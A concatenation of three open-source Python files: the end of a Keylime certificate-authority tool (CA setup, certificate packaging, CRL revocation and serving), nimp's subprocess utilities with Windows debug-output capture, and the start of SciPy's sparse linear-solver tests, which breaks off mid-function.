rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info(f"CA certificate created successfully in {workingdir}")
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip' % name, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip" %
(name, name))
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info(f"No CRL distribution points in {cert_path}")
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s" %
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d" %
(socket.getfqdn(), config.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing" % expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s" % revocation)
return
logger.info("Revoking certificate: %s" % serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet." %
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s" % config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s"
% args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s" % args.command)
parser.print_help()
sys.exit(-1)
|
process.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2019 Dontnod Entertainment
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
''' Process-related system utilities '''
import ctypes
import logging
import locale
import os
import os.path
import struct
import subprocess
import threading
import time
import nimp.sys.platform
def call(command, cwd='.', heartbeat=0, stdin=None, encoding='utf-8',
capture_output=False, capture_debug=False, hide_output=False, dry_run=False):
''' Calls a process redirecting its output to nimp's output '''
command = _sanitize_command(command)
if not hide_output:
logging.info('Running "%s" in "%s"', ' '.join(command), os.path.abspath(cwd))
if dry_run:
return 0
if capture_debug and not hide_output and nimp.sys.platform.is_windows():
_disable_win32_dialogs()
debug_pipe = _OutputDebugStringLogger()
else:
debug_pipe = None
# The bufsize = -1 is important; if we don’t bufferise the output, we’re
# going to make the callee lag a lot. In Python 3.3.1 this is now the
# default behaviour, but it used to default to 0.
try:
process = subprocess.Popen(command,
cwd = cwd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
stdin = subprocess.PIPE if stdin is not None else subprocess.DEVNULL,
bufsize = -1)
except FileNotFoundError as ex:
logging.error(ex)
return 1
if debug_pipe:
debug_pipe.attach(process.pid)
debug_pipe.start()
# FIXME: put all this in a class instead!
all_pipes = [ process.stdout,
process.stderr,
debug_pipe.output if debug_pipe else None ]
all_captures = [ [] if capture_output else None,
[] if capture_output else None,
None ]
debug_info = [ False ]
def _heartbeat_worker(heartbeat):
last_time = time.monotonic()
while process is not None:
if heartbeat > 0 and time.monotonic() > last_time + heartbeat:
logging.info("Keepalive for %s", command[0])
last_time += heartbeat
time.sleep(0.050)
def _input_worker(in_pipe, data):
in_pipe.write(data)
in_pipe.close()
def _output_worker(index):
in_pipe = all_pipes[index]
capture_array = all_captures[index]
if in_pipe is None:
return
force_ascii = locale.getpreferredencoding().lower() != 'utf-8'
while process is not None:
logger = logging.getLogger('child_processes')
# Try to decode as UTF-8 with BOM first; if it fails, try CP850 on
# Windows, or UTF-8 with BOM and error substitution elsewhere. If
# it fails again, try CP850 with error substitution.
encodings = [('ascii', 'backslashreplace') if force_ascii else ('utf-8-sig', 'strict'),
('cp850', 'strict') if nimp.sys.platform.is_windows() else ('utf-8-sig', 'replace'),
('cp850', 'replace')]
for data in iter(in_pipe.readline, b''):
for encoding, errors in encodings:
try:
line = data.decode(encoding, errors=errors)
break
except UnicodeError:
pass
if capture_array is not None:
capture_array.append(line)
# Stop reading data from stdout if data has arrived on OutputDebugString
if index == 2:
debug_info[0] = True
elif index == 0 and debug_info[0]:
logging.info('Stopping stdout monitoring (OutputDebugString is active)')
all_pipes[0].close()
return
if not hide_output:
logger.info(line.strip('\n').strip('\r'))
# Sleep for 10 milliseconds if there was no data,
# or we’ll hog the CPU.
time.sleep(0.010)
# Default threads
all_workers = [ threading.Thread(target=_output_worker, args=(i,)) for i in range(3) ]
# Thread to feed stdin data if necessary
if stdin is not None:
all_workers.append(threading.Thread(target=_input_worker, args=(process.stdin, stdin.encode(encoding))))
# Send keepalive to stderr if requested
if heartbeat > 0:
all_workers.append(threading.Thread(target = _heartbeat_worker, args = (heartbeat, )))
for thread in all_workers:
thread.start()
try:
exit_code = process.wait()
finally:
process = None
# For some reason, must be done _before_ threads are joined, or
# we get stuck waiting for something!
if debug_pipe:
debug_pipe.stop()
debug_pipe = None
for thread in all_workers:
thread.join()
if not hide_output:
logging.info('Finished with exit code %d (0x%08x)', exit_code, exit_code)
if capture_output:
return exit_code, ''.join(all_captures[0]), ''.join(all_captures[1])
return exit_code
def _sanitize_command(command):
new_command = []
for it in command:
# If we’re running under MSYS, leading slashes in command line arguments
# will be treated as a path, so we need to escape them, except if the given
# argument is indeed a file.
if it[0:1] == '/':
if nimp.sys.platform.is_msys():
# If the argument starts with /, we may wish to rewrite it
if it[1:2].isalpha() and it[2:3] == '/':
# Stuff like /c/... looks like a path with a drive letter, keep it that way
# but /c is most probably a flag, so that one needs to be escaped
pass
elif len(it) > 5 and (os.path.isfile(it) or os.path.isdir(it)):
pass
else:
it = '/' + it
new_command.append(it)
return new_command
if nimp.sys.platform.is_windows():
_KERNEL32 = ctypes.windll.kernel32 if hasattr(ctypes, 'windll') else None # pylint: disable = invalid-name
_KERNEL32.MapViewOfFile.restype = ctypes.c_void_p
_KERNEL32.UnmapViewOfFile.argtypes = [ctypes.c_void_p]
# Should be c_void_p(-1).value but doesn’t work
INVALID_HANDLE_VALUE = -1 # pylint: disable = invalid-name
WAIT_OBJECT_0 = 0x00000000 # pylint: disable = invalid-name
WAIT_OBJECT_1 = 0x00000001 # pylint: disable = invalid-name
INFINITE = 0xFFFFFFFF # pylint: disable = invalid-name
PAGE_READWRITE = 0x4 # pylint: disable = invalid-name
FILE_MAP_READ = 0x0004 # pylint: disable = invalid-name
SEM_FAILCRITICALERRORS = 0x0001 # pylint: disable = invalid-name
SEM_NOGPFAULTERRORBOX = 0x0002 # pylint: disable = invalid-name
SEM_NOOPENFILEERRORBOX = 0x8000 # pylint: disable = invalid-name
PROCESS_QUERY_INFORMATION = 0x0400 # pylint: disable = invalid-name
PROCESS_SYNCHRONIZE = 0x00100000 # pylint: disable = invalid-name
def _disable_win32_dialogs():
''' Disable “Entry Point Not Found” and “Application Error” dialogs for
child processes '''
_KERNEL32.SetErrorMode(SEM_FAILCRITICALERRORS \
| SEM_NOGPFAULTERRORBOX \
| SEM_NOOPENFILEERRORBOX)
class _OutputDebugStringLogger(threading.Thread):
''' Get output debug string from a process and writes it to a pipe '''
def __init__(self):
super().__init__()
fd_in, fd_out = os.pipe()
self.output = os.fdopen(fd_in, 'rb')
self._pipe_in = os.fdopen(fd_out, 'wb')
self._buffer_ev = _KERNEL32.CreateEventW(None, 0, 0, 'DBWIN_BUFFER_READY')
self._data_ev = _KERNEL32.CreateEventW(None, 0, 0, 'DBWIN_DATA_READY')
self._stop_ev = _KERNEL32.CreateEventW(None, 0, 0, None)
self._bufsize = 4096
self._mapping = _KERNEL32.CreateFileMappingW(INVALID_HANDLE_VALUE,
None,
PAGE_READWRITE,
0,
self._bufsize,
'DBWIN_BUFFER')
self._buffer = _KERNEL32.MapViewOfFile(self._mapping,
FILE_MAP_READ,
0, 0,
self._bufsize)
self._pid = None
@staticmethod
def _pid_to_winpid(pid):
# In case we’re running in MSYS2 Python, the PID we got is actually an
# internal MSYS2 PID, and the PID we want to watch is actually the WINPID,
# which we retrieve in /proc
try:
return int(open("/proc/%d/winpid" % (pid,)).read(10))
#pylint: disable=broad-except
except Exception:
return pid
def attach(self, pid):
''' Sets the process pid from which to capture output debug string '''
self._pid = _OutputDebugStringLogger._pid_to_winpid(pid)
logging.debug("Attached to process %d (winpid %d)", pid, self._pid)
def run(self):
pid_length = 4
data_length = self._bufsize - pid_length
# Signal that the buffer is available
_KERNEL32.SetEvent(self._buffer_ev)
events = [self._data_ev, self._stop_ev]
while True:
result = _KERNEL32.WaitForMultipleObjects(len(events),
(ctypes.c_void_p * len(events))(*events),
0,
INFINITE)
if result == WAIT_OBJECT_0:
pid_data = ctypes.string_at(self._buffer, pid_length)
pid, = struct.unpack('I', pid_data)
data = ctypes.string_at(self._buffer + pid_length, data_length)
# Signal that the buffer is available
_KERNEL32.SetEvent(self._buffer_ev)
if pid != self._pid:
continue
self._pipe_in.write(data[:data.index(0)])
self._pipe_in.flush()
elif result == WAIT_OBJECT_1:
break
else:
time.sleep(0.100)
def stop(self):
''' Stops this OutputDebugStringLogger '''
_KERNEL32.SetEvent(self._stop_ev)
self.join()
_KERNEL32.UnmapViewOfFile(self._buffer)
_KERNEL32.CloseHandle(self._mapping)
self._pipe_in.close()
self.output.close()
if nimp.sys.platform.is_windows():
class Monitor(threading.Thread):
''' Watchdog killing child processes when nimp ends '''
def __init__(self):
super().__init__()
self._watcher_event_handle = _KERNEL32.CreateEventW(None, 0, 0, None)
if self._watcher_event_handle == 0:
logging.error("cannot create event")
self._nimp_handle = _KERNEL32.OpenProcess(PROCESS_SYNCHRONIZE | PROCESS_QUERY_INFORMATION, False, os.getppid())
if self._nimp_handle == 0:
logging.error("cannot open nimp process")
def run(self):
events = [self._nimp_handle, self._watcher_event_handle]
while True:
result = _KERNEL32.WaitForMultipleObjects(len(events), (ctypes.c_void_p * len(events))(*events), 0, INFINITE)
if result == WAIT_OBJECT_0:
logging.debug("Parent nimp.exe is not running anymore: current python process and its subprocesses are going to be killed")
call(['taskkill', '/F', '/T', '/PID', str(os.getpid())])
break
elif result == WAIT_OBJECT_1:
break
def stop(self):
''' Stops this monitor '''
_KERNEL32.CloseHandle(self._nimp_handle)
_KERNEL32.SetEvent(self._watcher_event_handle)
else:
class Monitor():
def start(self):
pass
def stop(self):
pass
|
test_linsolve.py
|
from __future__ import division, print_function, absolute_import
import sys
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot
import numpy.random as random
from numpy.testing import (
assert_array_almost_equal, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose,
assert_warns)
import pytest
from pytest import raises as assert_raises
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, identity, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg import SuperLU
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu, spsolve_triangular, factorized)
from scipy._lib._numpy_compat import suppress_warnings
sup_sparse_efficiency = suppress_warnings()
sup_sparse_efficiency.filter(SparseEfficiencyWarning)
# scikits.umfpack is not a SciPy dependency but it is optionally used in
# dsolve, so check whether it's available
try:
import scikits.umfpack as umfpack
has_umfpack = True
except ImportError:
has_umfpack = False
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
class TestFactorized(object):
def setup_method(self):
n = 5
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n).tocsc()
random.seed(1234)
def _check_singular(self):
A = csc_matrix((5,5), dtype='d')
b = ones(5)
assert_array_almost_equal(0. * b, factorized(A)(b))
def _check_non_singular(self):
# Make a diagonal dominant, to make sure it is not singular
n = 5
a = csc_matrix(random.rand(n, n))
b = ones(n)
expected = splu(a).solve(b)
assert_array_almost_equal(factorized(a)(b), expected)
def test_singular_without_umfpack(self):
use_solver(useUmfpack=False)
with assert_raises(RuntimeError, match="Factor is exactly singular"):
self._check_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_singular_with_umfpack(self):
use_solver(useUmfpack=True)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "divide by zero encountered in double_scalars")
assert_warns(umfpack.UmfpackWarning, self._check_singular)
def test_non_singular_without_umfpack(self):
use_solver(useUmfpack=False)
self._check_non_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_non_singular_with_umfpack(self):
use_solver(useUmfpack=True)
self._check_non_singular()
def test_cannot_factorize_nonsquare_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
msg = "can only factor square matrices"
with assert_raises(ValueError, match=msg):
factorized(self.A[:, :4])
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_factorizes_nonsquare_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
# does not raise
factorized(self.A[:,:4])
def test_call_with_incorrectly_sized_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
with assert_raises(ValueError, match="is of incompatible size"):
solve(b)
with assert_raises(ValueError, match="is of incompatible size"):
solve(B)
with assert_raises(ValueError,
match="object too deep for desired array"):
solve(BB)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_incorrectly_sized_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
# does not raise
solve(b)
msg = "object too deep for desired array"
with assert_raises(ValueError, match=msg):
solve(B)
with assert_raises(ValueError, match=msg):
solve(BB)
def test_call_with_cast_to_complex_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
with assert_raises(TypeError, match="Cannot cast array data"):
solve(b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_cast_to_complex_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_warns(np.ComplexWarning, solve, b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_assume_sorted_indices_flag(self):
# a sparse matrix with unsorted indices
unsorted_inds = np.array([2, 0, 1, 0])
data = np.array([10, 16, 5, 0.4])
indptr = np.array([0, 1, 2, 4])
A = csc_matrix((data, unsorted_inds, indptr), (3, 3))
b = ones(3)
# should raise when incorrectly assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=True)
with assert_raises(RuntimeError,
match="UMFPACK_ERROR_invalid_matrix"):
factorized(A)
# should sort indices and succeed when not assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=False)
expected = splu(A.copy()).solve(b)
assert_equal(A.has_sorted_indices, 0)
assert_array_almost_equal(factorized(A)(b), expected)
assert_equal(A.has_sorted_indices, 1)
class TestLinsolve(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
with suppress_warnings() as sup:
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
try:
# should either raise a runtimeerror or return value
# appropriate for singular input
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
@sup_sparse_efficiency
def test_non_square(self):
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
@sup_sparse_efficiency
def test_example_comparison(self):
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
@sup_sparse_efficiency
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_shape_compatibility(self):
use_solver(useUmfpack=True)
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
# interprets also these as "vectors"
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
@sup_sparse_efficiency
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
